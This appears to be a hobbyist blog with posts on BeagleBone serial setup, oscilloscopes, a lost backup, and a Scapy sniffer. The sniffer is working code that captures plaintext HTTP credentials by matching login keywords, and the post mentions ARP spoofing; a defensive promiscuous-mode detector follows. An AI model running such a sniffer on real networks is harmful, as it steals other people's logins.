connecting BBB /w USB Oscilloscope

We used quite a fancy digital oscilloscope in the reverse engineering laboratory. Outside the lab, I had to find a better way to make up for my poor learning skills. Honestly, I am not a hardware guy, so there was always a lot of trial and error whenever I played with the BeagleBone. Fortunately, I have now found out how to connect a USB-to-TTL serial cable and how to display frequency on an alternative oscilloscope.

Make stable connections with BBB

First things first, we need to connect the BBB to the PC with a regular USB cable.
There is a trick. When the BBB is connected to the PC, the 4 blue LEDs blink simultaneously. As soon as they stop blinking, plug the USB-to-TTL cable into the serial debug slot. The first slot is GND, the fourth is TX and the fifth is RX. The safe option is to push the reset button in any unusual case.

Base terminal application

I have been using Screen for the Raspberry Pi, but Minicom is much better for the BBB since it can modify some communication options such as hardware flow control.

Just make the same configuration in Minicom by using the minicom -s option, then save the setup as dfl. The serial device location can be found in the dmesg output.

PC based digital oscilloscope

The only thing I needed to know was how to recap my hands-on exercises. There were a bunch of USB digital oscilloscopes, but I chose Hantek since it was the most cost-effective product on the market. If I had enough budget, I would buy the Analog Discovery 2 USB Oscilloscope. Alternatively, I believe the Hantek PC Based USB Digital Storage Oscilloscope 6022BE is enough for my purpose. This article was quite helpful: Top 7 PC-based USB oscilloscopes of 2017: for hobbyists, makers, and pros

snapshot

I should have followed the wise saying: “There are two types of people. Those who backup and those who have yet to lose everything to a system crash.”

I wrote some takeaways from my current learning practices in this tidy little space. The website was running on an ESXi VM for a few months without issue; however, an error occurred while migrating and installing the hypervisors. I thought I had made a full disk backup, but I did not notice that the file contained some errors. So, now I am in the middle of recovering my previous records.

Anyways, it’s time to move one step further.

sniff network /w scapy

There is always a chance of capturing someone else's unencrypted traffic, especially on a local network. We might use ARP spoofing, poisoning, a gateway attack or whatever, but Scapy is one of the great tools for checking the network environment.

Prerequisites

$ sudo apt-get install python-scapy python-pip
$ pip install scapy_http

Enable promiscuous mode on the network interface
$ sudo ifconfig <interface> promisc    # e.g. eth0

It is always best to try it on a bridged network. To avoid interference, testing on the local host machine would be the best practice.

import argparse

import scapy.all as scapy
from scapy_http import http


def get_arguments():
    # -i/--interface selects the network interface to listen on
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--interface", dest="interface",
                        help="Interface name")
    options = parser.parse_args()
    return options


def sniff_packet(interface):
    # store=False keeps packets out of memory; each one goes to process_packets
    scapy.sniff(iface=interface, store=False, prn=process_packets)


def get_url(packet):
    # Host header plus request path gives the requested URL
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path


def get_credentials(packet):
    # Return the raw request body if it contains a login-related keyword
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load
        keywords = ["login", "submission", "challenge", "password",
                    "username", "user", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load
    return None


def process_packets(packet):
    # Only unencrypted HTTP requests are parsed; everything else is ignored
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] Http Request >> " + url)
        credentials = get_credentials(packet)
        if credentials:
            print("[+] Someone has submitted flag, interested? " + credentials + "\n\n")


if __name__ == "__main__":
    options = get_arguments()
    sniff_packet(options.interface)
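
On the monitoring side, the promiscuous-mode step above leaves a trace: the kernel sets IFF_PROMISC in the interface flags. The check below is an added example, not code from the original post; it reads the Linux /sys/class/net/<iface>/flags files, and the flag values in build_sample_tree are constructed sample data.

```python
import os
import tempfile

IFF_UP = 0x1         # interface is administratively up (linux/if.h)
IFF_PROMISC = 0x100  # interface accepts every frame it sees (linux/if.h)


def read_flags(iface, sysfs_root="/sys/class/net"):
    """Return the kernel flag word for one interface, or None if unreadable."""
    try:
        with open(os.path.join(sysfs_root, iface, "flags")) as fh:
            return int(fh.read().strip(), 16)
    except (OSError, ValueError):
        return None  # not an interface directory, or no hex number in the file


def promiscuous_interfaces(sysfs_root="/sys/class/net"):
    """List (name, is_up) for every interface that has IFF_PROMISC set."""
    found = []
    for iface in sorted(os.listdir(sysfs_root)):
        flags = read_flags(iface, sysfs_root)
        if flags is not None and flags & IFF_PROMISC:
            found.append((iface, bool(flags & IFF_UP)))
    return found


def build_sample_tree():
    """Constructed sample data: a fake sysfs tree so the check runs offline."""
    root = tempfile.mkdtemp()
    samples = {"lo": "0x9", "eth0": "0x1103", "wlan0": "0x1003", "bad0": "garbage"}
    for name, value in samples.items():
        os.mkdir(os.path.join(root, name))
        with open(os.path.join(root, name, "flags"), "w") as fh:
            fh.write(value + "\n")
    return root


if __name__ == "__main__":
    # Use the real sysfs tree on Linux, otherwise the constructed sample tree
    root = "/sys/class/net" if os.path.isdir("/sys/class/net") else build_sample_tree()
    for name, is_up in promiscuous_interfaces(root):
        print("[!] %s is in promiscuous mode (%s)" % (name, "up" if is_up else "down"))
```

Run on a schedule and compared against the interfaces that are expected to be capturing, this flags a host that has started listening to traffic not addressed to it.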